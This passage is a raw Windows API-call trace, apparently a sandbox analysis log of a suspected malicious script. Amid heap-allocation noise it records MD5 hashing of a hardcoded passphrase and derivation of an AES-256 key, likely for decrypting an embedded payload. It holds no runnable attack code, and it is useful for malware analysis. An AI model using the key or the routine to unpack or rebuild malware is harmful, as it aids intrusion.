[0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0093.188] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.189] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0093.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796f28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0093.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0093.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15) returned 0x1796ee8 [0093.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ee8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0093.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0093.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0093.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0093.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0093.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0093.238] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0093.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0093.240] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0093.240] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2550 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0093.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0093.241] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0093.241] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0093.241] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0093.241] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0093.241] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0093.242] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0093.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0093.242] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0093.242] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.242] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0093.242] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.242] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0093.242] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cac88, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0093.243] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0093.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0093.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0093.243] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0093.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0093.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0093.243] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.243] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cabf8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0093.243] CryptHashData (hHash=0x41ac280, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0093.243] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.243] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0093.243] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0093.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cab98, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0093.243] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac280, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac700) returned 1 [0093.243] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.243] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0093.244] CryptDestroyHash (hHash=0x41ac280) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0093.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: 